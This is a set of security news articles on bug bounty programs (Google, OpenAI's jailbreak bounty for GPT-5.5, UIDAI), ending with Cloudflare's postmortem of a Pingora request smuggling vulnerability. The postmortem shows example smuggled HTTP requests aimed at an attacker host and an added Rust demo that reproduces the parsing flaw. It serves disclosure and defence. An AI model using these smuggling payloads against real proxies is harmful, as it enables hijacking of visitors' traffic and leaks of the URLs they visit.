
Google Revamps Bug Bounty Programs: Android Rewards Rise, Chrome Payouts Drop in the Age of AI

Google revamps bug bounties: Android rewards rise to $1.5M, Chrome payouts drop, shifting focus to high-impact, AI-resistant vulnerabilities.

Google has announced a major overhaul of its Vulnerability Reward Programs (VRP) for Android and Chrome, marking a strategic shift in how the company approaches cybersecurity. The update comes as artificial intelligence tools are reshaping the field of vulnerability discovery, transforming both the speed and nature of security research.

Over the past few years, generative AI systems have revolutionized bug hunting. Advanced tools, some still limited in availability, like Claude Mythos or GPT 5.4 Cyber, can automate large portions of code analysis and exploit development. Even widely available AI models have led to a surge in vulnerability submissions, though not all of them are useful or reproducible.

Google says these changes made it necessary to evolve its bounty programs, moving away from a focus on quantity toward quality and user impact.

“Over the past few years, AI and automation have accelerated the pace of vulnerability discovery, and our teams are moving at an unprecedented rate – remediating risks more effectively than ever before. The latest advancements in AI from Google and the broader industry have made it significantly easier to take a test case and explain the root cause, propose a suitable fix, and to find variants of known problems,” reads the announcement. “And to keep pace with vulnerability discovery, we’ve been continuing to implement structural improvements in our products to make it increasingly difficult to achieve full chain exploits.”

The new goal is to incentivize actionable reports, vulnerability submissions that include concrete proof, feasible exploit demonstrations, and ideally, suggested fixes.

The Android and Google Devices VRP sees the most dramatic updates. The program now prioritizes vulnerabilities with high user impact and those that remain difficult for AI tools to detect automatically.

The top reward for a zero-click exploit targeting the Pixel’s Titan M security chip with persistence has increased from $1 million to $1.5 million. For exploits without persistence, the reward rises from $500,000 to $750,000. Additionally, successful secure element data exfiltration can now earn up to $375,000, up from $250,000.

Google is also putting more emphasis on complete, proof-of-concept submissions and proposed patches. Reports accompanied by practical solutions or fixes will be strongly incentivized. At the same time, the company is narrowing its focus on vulnerabilities affecting Google-maintained components, rather than the Linux kernel as a whole, unless a vulnerability can be proven exploitable on Android or Google devices.

For Chrome, Google is taking the opposite route: standard payouts are decreasing across most categories. The rationale is that while AI tools can easily produce long, detailed write-ups, Google now values concise, verifiable reports that demonstrate a reproducible problem rather than merely describing it.

The base reward for memory safety issues is now $500, with multipliers applied for factors like reachability and exploitability. The company has also phased out the bonuses introduced in 2025 for arbitrary read/write and remote code execution vulnerabilities, citing an overwhelming influx of AI-generated reports.

That said, a full-chain Chrome exploit remains highly lucrative, worth up to $250,000, with an additional $250,000 bonus for bypassing Google’s MiraclePtr protections. Google also plans to release special Chrome builds to help researchers reproduce complex issues such as memory leaks or arbitrary memory access.

“While AI has made it effortless to produce lengthy, detailed write-ups, our internal tooling has also evolved to help us automatically explain and suggest fixes for bugs. Moving forward, we are shifting our program’s focus to prioritize concrete proof that a bug exists,” continues the announcement. “We now consider the most effective reports to be concise, containing only a reproducer and the necessary artifacts to help us validate and route the issue.”

Although some individual payouts have decreased, Google expects to increase its total rewards in 2026, following a record-breaking $17.1 million paid out in 2025. The company emphasizes that the move is not about cost-cutting but about optimizing value and efficiency in vulnerability research.

Other major security organizations are facing the same reality. The Internet Bug Bounty (IBB) program recently paused new submissions due to an overwhelming number of AI-generated reports. The challenge is no longer just finding bugs, it’s handling the flood of data and distinguishing meaningful discoveries from AI-generated noise.

Google is taking a balanced approach to AI in cybersecurity, not resisting it but shaping how it’s used. While AI can quickly find vulnerabilities, it can also overwhelm teams with low-value reports. By updating its bug bounty programs, Google aims to reward quality over quantity and encourage human insight. This strategy could influence how other tech companies adapt their security programs in an AI-driven landscape.

“Along with these changes, we will be reducing some of our reward amounts and bonuses across Android and Chrome. While these adjustments may reduce the payout for a single bug report, we continue to prioritize our VRPs and the total aggregate rewards paid out in 2026 is expected to increase,” concludes the announcement. “The new values and reward categories are now live on our Android and Chrome rules pages. We’ll continue to evaluate and refine our VRPs to ensure they remain the industry standard for security research.”


Pierluigi Paganini

(SecurityAffairs – hacking, Google Bug Bounty)

GPT‑5.5 Bio Bug Bounty to Strengthen Advanced AI Capabilities

OpenAI has announced a new Bio Bug Bounty program for GPT-5.5 as part of its efforts to improve safety controls for advanced AI systems and to address misuse in biology.

The initiative invites qualified researchers to test whether GPT-5.5 can be universally jailbroken to bypass biosecurity protections.

The program is focused on one specific challenge: participants must find a single “universal jailbreak” prompt that can make GPT-5.5 answer all five questions in OpenAI’s bio safety challenge from a clean chat session, without triggering moderation.

Strengthen Safeguards for Advanced AI

In simple terms, researchers are being asked to determine whether a carefully designed prompt can consistently override the model’s biological safety guardrails.

According to OpenAI, the model in scope is GPT-5.5 running only in Codex Desktop.

The company is offering a top reward to the first participant who successfully discovers a true universal jailbreak that clears all five challenge questions.

OpenAI also said it may issue smaller rewards for partial successes, depending on the results. Applications for the program opened on April 23, 2026, and will close on June 22, 2026.

Testing begins on April 28 and will run through July 27, 2026. Access is not open to the public.

Instead, OpenAI will invite a vetted group of trusted bio red-teamers and also review applications from new researchers with relevant experience in AI red teaming, security, or biosecurity.

To take part, applicants must submit a short form including their name, affiliation, and experience.

Accepted participants and collaborators must already have ChatGPT accounts and must sign a non-disclosure agreement.

OpenAI said all prompts, model outputs, findings, and related communications will remain under NDA.

From a cybersecurity perspective, the program reflects a growing trend in adversarial testing of frontier AI systems.

Bug bounty programs have long been used to find vulnerabilities in software, cloud platforms, and enterprise products.

OpenAI is applying a similar model to AI safety by asking experts to actively probe its defenses and identify prompt-based weaknesses before threat actors do.

The focus on biology is especially important because powerful AI models could be misused to support harmful scientific tasks if safeguards fail.

By testing GPT-5.5 against universal jailbreaks, OpenAI appears to be measuring the resilience of its protections under realistic attack conditions.

The company said researchers interested in broader security work can also look at its existing Safety Bug Bounty and Security Bug Bounty programs.

The new GPT-5.5 Bio Bug Bounty adds another layer to that effort, showing how AI security increasingly overlaps with biosecurity, red teaming, and advanced prompt-injection research.


The post GPT‑5.5 Bio Bug Bounty to Strengthen Advanced AI Capabilities appeared first on Cyber Security News.

GPT-5.5 Bio Bug Bounty Program Aims to Improve AI Safety and Performance

OpenAI has officially launched the GPT-5.5 Bio Bug Bounty program to strengthen safeguards against emerging biological risks. As artificial intelligence models become more advanced, the potential for malicious actors to generate dangerous biological information increases. Advanced persistent threats (APTs) and lone attackers could potentially misuse large language models to accelerate harmful biological research. To address […]

The post GPT-5.5 Bio Bug Bounty Program Aims to Improve AI Safety and Performance appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Google’s Bug Bounty Program Hits All-Time High With $17 Million in 2025 Payouts

Google’s Vulnerability Reward Program (VRP) celebrated its 15th anniversary in 2025 by breaking every payout record in its history.

The tech giant awarded a staggering $17 million to external security researchers worldwide, representing a massive 40% surge compared to 2024.

Over 700 ethical hackers from across the globe successfully identified and responsibly disclosed vulnerabilities, proving the continued necessity of community-driven security research to protect critical infrastructure.

Artificial intelligence dominated Google’s threat modeling and security focus last year. To address the rapidly changing attack surface of machine learning models, Google officially launched a dedicated AI Vulnerability Reward Program.

Previously managed under the Abuse VRP umbrella, this new standalone category provides researchers with precise scoping rules and clear reward tiers for AI-specific exploits. The browser security team also adapted to these emerging threats.

Google’s Bug Bounty Program

The Chrome VRP now features specific reward categories dedicated entirely to flaws discovered within Chrome’s integrated AI and Gemini features. Active community engagement drove much of 2025’s record-breaking success.

Google hosted multiple editions of bugSWAT, an exclusive, invite-only live hacking event series that targets high-priority attack surfaces.

Vulnerability Reward Program 2025 (Source: Google)

Major bugSWAT events in 2025 included:

  • Sunnyvale Cloud bugSWAT led to 130 vulnerability reports and a massive $1.6 million in payouts.
  • Tokyo AI bugSWAT generated over 70 reports and $400,000 in rewards during April.
  • Mexico City bugSWAT paid out $566,000 for 107 reports spanning AI, Android, and Cloud targets.
  • Las Vegas bugSWAT added 77 verified reports and $380,000 in bounties to the yearly total.

Beyond direct product hacking, Google launched a unique patch-reward program for OSV-SCALIBR, an open-source tool that detects vulnerabilities in software dependencies.

Security contributors now earn rewards for building novel OSV-SCALIBR plugins that improve inventory tracking or secret detection. Google noted that these community submissions have already helped the company discover and remediate internal leaked secrets.

Global outreach also saw a massive upgrade with the launch of ESCAL8, a dedicated security conference hosted in Mexico City. The event featured technical thought leadership seminars, student workshops, and the HACKCELER8 Capture the Flag (CTF) finals.

Google plans to carry this momentum into 2026 by expanding its collaboration with the external security community.

The VRP team is actively scheduling new bugSWAT events globally and preparing for the next iteration of the ESCAL8 conference.

As threat actors continuously adapt to novel technologies, Google’s massive bug bounty investments highlight a clear strategy. Crowdsourced security research remains one of the strongest defenses against emerging cyber threats.


The post Google’s Bug Bounty Program Hits All-Time High With $17 Million in 2025 Payouts appeared first on Cyber Security News.

Google’s Bug Bounty Program Hits Record $17 Million in 2025 Payouts

Google has announced a record-breaking year for its Vulnerability Reward Program (VRP). In 2025, the tech giant paid out more than $17 million to ethical hackers worldwide to help secure its platforms. This major milestone marks a massive 40% increase compared to 2024 and perfectly aligns with the program’s 15th anniversary. Over 700 security researchers […]

The post Google’s Bug Bounty Program Hits Record $17 Million in 2025 Payouts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

UIDAI Introduces Bug Bounty Program to Strengthen Aadhaar Defenses

The Unique Identification Authority of India (UIDAI) has officially launched its first structured bug bounty program to fortify the Aadhaar system. As the foundation of a massive national identity database, securing Aadhaar requires continuous innovation and rigorous testing. This new initiative invites top cybersecurity experts to proactively identify and responsibly disclose potential vulnerabilities within UIDAI’s […]

The post UIDAI Introduces Bug Bounty Program to Strengthen Aadhaar Defenses appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

India Introduces Bug Bounty Program to Target Gaps in Aadhaar Ecosystem

UIDAI Bug Bounty

The Unique Identification Authority of India has introduced a structured UIDAI bug bounty program designed to strengthen the cybersecurity of India’s Aadhaar ecosystem. The initiative is one of the authority’s first organized efforts to engage independent cybersecurity professionals and ethical hackers in identifying vulnerabilities across its digital platforms. As part of the broader Indian government bug bounty efforts to protect critical digital infrastructure, the program invites experts to responsibly report potential security weaknesses before they can be exploited.

UIDAI Bug Bounty Program Targets Key Aadhaar Platforms 

Under the new UIDAI bug bounty initiative, a panel of 20 experienced security researchers and ethical hackers has been selected to participate in the program. These experts will assess several critical digital assets managed by UIDAI, including the official website, the myAadhaar portal, and the Secure QR Code application used in Aadhaar authentication processes.

The researchers will examine these platforms to uncover potential vulnerabilities in the systems. Once a flaw is identified, participants must follow responsible disclosure practices by reporting it directly to UIDAI through the program’s official channels.

Each reported vulnerability will be evaluated and categorized by severity. Like other major Indian government bug bounty initiatives, the program uses a four-tier classification system: Critical, High, Medium, and Low risk. Rewards will be granted to participating researchers depending on the seriousness and potential impact of the discovered issue.

The Indian government has stated that the UIDAI bug bounty program is intended to proactively identify and address security gaps before they can be exploited by malicious actors.

Collaboration with Cybersecurity Firm 

To manage and coordinate the initiative effectively, UIDAI is implementing the program in collaboration with ComOlho IT Private Limited, a cybersecurity solutions provider. The company will assist in overseeing the vulnerability submission process, coordinating with researchers, and supporting the overall management of the UIDAI bug bounty program. The collaboration is expected to streamline communication between ethical hackers and government teams responsible for maintaining the Aadhaar infrastructure.

According to UIDAI, ensuring robust information security has become increasingly important as more services move to digital platforms. Aadhaar, which is used across numerous public and private services in India, requires a resilient cybersecurity framework to protect sensitive user data.

The authority already maintains multiple layers of protection across its systems. These include regular security audits, vulnerability assessments, penetration testing, and continuous monitoring of digital infrastructure. The UIDAI bug bounty program adds a defensive layer by enabling external experts to discover vulnerabilities that may not be detected during internal security checks.

By inviting independent researchers to test its systems, the Indian government’s bug bounty initiative aims to enhance the resilience of Aadhaar’s digital architecture and ensure that potential weaknesses are addressed promptly.

Bug Bounty Program Becoming Standard Security Practice 

The Ministry of Electronics and Information Technology (MeitY) noted that bug bounty programs are widely adopted by leading technology companies around the world to improve the security and reliability of digital systems. Through the UIDAI bug bounty program, the Indian government is applying similar practices within its public digital infrastructure.

The UIDAI bug bounty program also forms part of a broader network of Indian government bug bounty and vulnerability disclosure initiatives designed to safeguard digital infrastructure. One of the key programs is run by the Indian Computer Emergency Response Team (CERT-In), which facilitates responsible vulnerability disclosure policies aimed at protecting the country’s “Digital India” infrastructure. CERT-In enables researchers to report vulnerabilities affecting government digital services.

Another initiative is managed by the National Critical Information Infrastructure Protection Centre (NCIIPC). The organization encourages security researchers to identify and report critical vulnerabilities in government websites and infrastructure, particularly those under the .gov.in domain.

In addition to these programs, specific platforms have also launched targeted bug bounty initiatives. For example, the government’s Aarogya Setu application previously ran a bug bounty program offering rewards of up to INR 1 lakh (1,083 USD) for valid vulnerability reports.

How Researchers Can Participate

Participation in many Indian government bug bounty programs is open to cybersecurity professionals and ethical hackers. Vulnerabilities affecting government infrastructure can typically be reported through CERT-In’s disclosure channels. For NCIIPC initiatives, researchers are required to complete a Vulnerability Disclosure Form and submit it via email to rvdp@nciipc.gov.in.

Some programs, including the UIDAI bug bounty, may involve stricter eligibility requirements. In certain cases, researchers must demonstrate a strong track record in cybersecurity, such as appearing in the top 100 recognized bug bounty leaderboards. Most Indian government bug bounty programs are free to participate in, and several offer monetary rewards for high-impact vulnerability discoveries.

Resolving a request smuggling vulnerability in Pingora

On April 11, 2025 09:20 UTC, Cloudflare was notified via its Bug Bounty Program of a request smuggling vulnerability (CVE-2025-4366) in the Pingora OSS framework discovered by a security researcher experimenting to find exploits using Cloudflare’s Content Delivery Network (CDN) free tier which serves some cached assets via Pingora.

Customers using the free tier of Cloudflare’s CDN, or users of the caching functionality provided in the open source pingora-proxy and pingora-cache crates, could have been exposed. Cloudflare’s investigation revealed no evidence that the vulnerability was being exploited, and the vulnerability was mitigated by April 12, 2025 06:44 UTC, within 22 hours of notification.

What was the vulnerability?

The bug bounty report detailed that an attacker could potentially exploit an HTTP/1.1 request smuggling vulnerability on Cloudflare’s CDN service. The reporter noted that via this exploit, they were able to cause visitors to Cloudflare sites to make subsequent requests to their own server and observe which URLs the visitor was originally attempting to access.

We treat any potential request smuggling or caching issue with extreme urgency. After our security team escalated the vulnerability, we began investigating immediately, took steps to disable traffic to vulnerable components, and deployed a patch.

We are sharing the details of the vulnerability, how we resolved it, and what we can learn from the incident. No action is needed from Cloudflare customers, but if you are using the Pingora OSS framework, we strongly urge you to upgrade to Pingora 0.5.0 or later.

What is request smuggling?

Request smuggling is a type of attack where an attacker can exploit inconsistencies in the way different systems parse HTTP requests. For example, when a client sends an HTTP request to an application server, it typically passes through multiple components such as load balancers, reverse proxies, etc., each of which has to parse the HTTP request independently. If two of the components the request passes through interpret the HTTP request differently, an attacker can craft a request that one component sees as complete, but the other continues to parse into a second, malicious request made on the same connection.

Request smuggling vulnerability in Pingora

In the case of Pingora, the reported request smuggling vulnerability was made possible by an HTTP/1.1 parsing bug that occurred only when caching was enabled.

The pingora-cache crate adds an HTTP caching layer to a Pingora proxy, allowing content to be cached on a configured storage backend to help improve response times, and reduce bandwidth and load on backend servers.

HTTP/1.1 supports “persistent connections”, such that one TCP connection can be reused for multiple HTTP requests, instead of needing to establish a connection for each request. However, only one request can be processed on a connection at a time (with rare exceptions such as HTTP/1.1 pipelining). The RFC notes that each request must have a “self-defined message length” for its body, as indicated by headers such as Content-Length or Transfer-Encoding to determine where one request ends and another begins.

Pingora generally handles requests on HTTP/1.1 connections in an RFC-compliant manner, either ensuring the downstream request body is properly consumed or declining to reuse the connection if it encounters an error. After the bug was filed, we discovered that when caching was enabled, this logic was skipped on cache hits (i.e. when the service’s cache backend can serve the response without making an additional upstream request).

This meant on a cache hit request, after the response was sent downstream, any unread request body left in the HTTP/1.1 connection could act as a vector for request smuggling. When formed into a valid (but incomplete) header, the request body could “poison” the subsequent request. The following example is a spec-compliant HTTP/1.1 request which exhibits this behavior:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1
Host: attacker.example.com
Bogus: foo

Let’s say there is a different request to victim.example.com that will be sent after this one on the reused HTTP/1.1 connection to a Pingora reverse proxy. The bug means that a Pingora service may not respect the Content-Length header and instead misinterpret the smuggled request as the beginning of the next request:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

Thus, the smuggled request could inject headers and its URL into a subsequent valid request sent on the same connection to a Pingora reverse proxy service.
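The framing discrepancy described above can be reproduced on a byte buffer. The following is an added example written for this article, not Pingora’s own code: a tiny HTTP/1.1 request reader with two modes, one that leaves the Content-Length body unread (the cache-hit path that caused the bug) and one that drains it and refuses to reuse the connection when the body is truncated (the compliant behaviour). The sample connection is constructed here, with the smuggled body sized exactly to its Content-Length, so the `Bogus` header visibly swallows the victim’s request line; `attacker.example.com`, `victim.example.com` and the URLs are the article’s illustrative names.

```rust
// Added example (not Pingora's code): a minimal model of the HTTP/1.1
// framing bug behind CVE-2025-4366, run over a constructed byte stream.

#[derive(Debug, Clone, PartialEq)]
pub struct Request {
    pub request_line: String,
    pub headers: Vec<(String, String)>, // header names lower-cased
    pub body: Vec<u8>,
}

fn find(hay: &[u8], needle: &[u8]) -> Option<usize> {
    hay.windows(needle.len()).position(|w| w == needle)
}

/// Parse one request head starting at `pos`; returns the request line,
/// the headers and the offset of the first body byte. Does not touch the body.
fn parse_head(buf: &[u8], pos: usize) -> Option<(String, Vec<(String, String)>, usize)> {
    let rest = buf.get(pos..)?;
    let end = find(rest, b"\r\n\r\n")?;
    let head = std::str::from_utf8(&rest[..end]).ok()?;
    let mut lines = head.split("\r\n");
    let request_line = lines.next()?.to_string();
    let mut headers = Vec::new();
    for line in lines {
        let (name, value) = line.split_once(':')?;
        headers.push((name.trim().to_ascii_lowercase(), value.trim().to_string()));
    }
    Some((request_line, headers, pos + end + 4))
}

fn content_length(headers: &[(String, String)]) -> usize {
    headers
        .iter()
        .find(|(k, _)| k == "content-length")
        .and_then(|(_, v)| v.parse().ok())
        .unwrap_or(0)
}

/// Read every request framed on one reused connection.
/// `drain_body == false` models the cache-hit path that left the body unread;
/// `drain_body == true` models the compliant path: consume exactly
/// Content-Length bytes, and stop reusing the connection if they are not all there.
pub fn read_connection(buf: &[u8], drain_body: bool) -> Vec<Request> {
    let mut out = Vec::new();
    let mut pos = 0;
    while let Some((request_line, headers, body_start)) = parse_head(buf, pos) {
        let len = content_length(&headers);
        let (body, next) = if drain_body {
            match buf.get(body_start..body_start + len) {
                Some(b) => (b.to_vec(), body_start + len),
                None => break, // truncated body: do not reuse the connection
            }
        } else {
            (Vec::new(), body_start) // bug: the body bytes become the "next request"
        };
        out.push(Request { request_line, headers, body });
        pos = next;
    }
    out
}

/// Constructed sample: the article's attack request (body sized exactly to
/// Content-Length) followed by an unrelated victim request on the same connection.
pub fn sample_connection() -> Vec<u8> {
    let smuggled = b"GET / HTTP/1.1\r\nHost: attacker.example.com\r\nBogus: foo";
    let mut conn = format!(
        "GET /attack/foo.jpg HTTP/1.1\r\nHost: example.com\r\nContent-Length: {}\r\n\r\n",
        smuggled.len()
    )
    .into_bytes();
    conn.extend_from_slice(smuggled);
    conn.extend_from_slice(b"GET /victim/main.css HTTP/1.1\r\nHost: victim.example.com\r\n\r\n");
    conn
}

fn main() {
    let conn = sample_connection();
    for (label, drain) in [("cache-hit bug", false), ("compliant", true)] {
        println!("== {label} ==");
        for r in read_connection(&conn, drain) {
            println!("{}  headers={:?}  body={} bytes", r.request_line, r.headers, r.body.len());
        }
    }
}
```

In the buggy mode the second parsed request is `GET / HTTP/1.1` with two `Host` headers and a `Bogus` value that begins with `fooGET /victim/main.css HTTP/1.1`, which is the poisoned request the article shows; in the compliant mode the first request carries its 54-byte body and the second is the victim’s own request, untouched. A duplicate `Host` header on an upstream request is a cheap detection signal for this class of problem.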

CDN request smuggling and hijacking

On April 11, 2025, Cloudflare was in the process of rolling out a Pingora proxy component with caching support enabled to a subset of CDN free plan traffic. This component was vulnerable to this request smuggling attack, which could enable modifying request headers and/or URL sent to customer origins.

As previously noted, the security researcher reported that they were also able to cause visitors to Cloudflare sites to make subsequent requests to their own malicious origin and observe which site URLs the visitor was originally attempting to access. During our investigation, Cloudflare found that certain origin servers would be susceptible to this secondary attack effect. The smuggled request in the example above would be sent to the correct origin IP address per customer configuration, but some origin servers would respond to the rewritten attacker Host header with a 301 redirect. Continuing from the prior example:

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

HTTP/1.1 301 Moved Permanently // <- susceptible victim origin response
Location: https://attacker.example.com/
<other headers…>

When the client browser followed the redirect, it would send a request to the attacker hostname along with a Referer header indicating which URL was originally visited, making it possible to load a malicious asset and observe what traffic a visitor was trying to access.

GET / HTTP/1.1 // <- redirect-following request
Host: attacker.example.com
Referer: https://victim.example.com/victim/main.css
<other headers…>

Upon verifying the Pingora proxy component was susceptible, the team immediately disabled CDN traffic to the vulnerable component on 2025-04-12 06:44 UTC to stop possible exploitation. By 2025-04-19 01:56 UTC and prior to re-enablement of any traffic to the vulnerable component, a patch fix to the component was released, and any assets cached on the component’s backend were invalidated in case of possible cache poisoning as a result of the injected headers.

Remediation and next steps

If you are using the caching functionality in the Pingora framework, you should update to Pingora 0.5.0 or later. If you are a Cloudflare customer with a free plan, you do not need to do anything, as we have already applied the patch for this vulnerability.

Timeline

All timestamps are in UTC.

  • 2025-04-11 09:20 – Cloudflare is notified of a CDN request smuggling vulnerability via the Bug Bounty Program.

  • 2025-04-11 17:16 to 2025-04-12 03:28 – Cloudflare confirms vulnerability is reproducible and investigates which component(s) require necessary changes to mitigate.

  • 2025-04-12 04:25 – Cloudflare isolates issue to roll out of a Pingora proxy component with caching enabled and prepares release to disable traffic to this component.

  • 2025-04-12 06:44 – Rollout to disable traffic complete, vulnerability mitigated.

Conclusion

We would like to sincerely thank James Kettle & Wannes Verwimp, who responsibly disclosed this issue via our Cloudflare Bug Bounty Program, allowing us to identify and mitigate the vulnerability. We welcome further submissions from our community of researchers to continually improve the security of all of our products and open source projects.

Whether you are a customer of Cloudflare or just a user of our Pingora framework, or both, we know that the trust you place in us is critical to how you connect your properties to the rest of the Internet. Security is a core part of that trust and for that reason we treat these kinds of reports and the actions that follow with serious urgency. We are confident about this patch and the additional safeguards that have been implemented, but we know that these kinds of issues can be concerning. Thank you for your continued trust in our platform. We remain committed to building with security as our top priority and responding swiftly and transparently whenever issues arise.
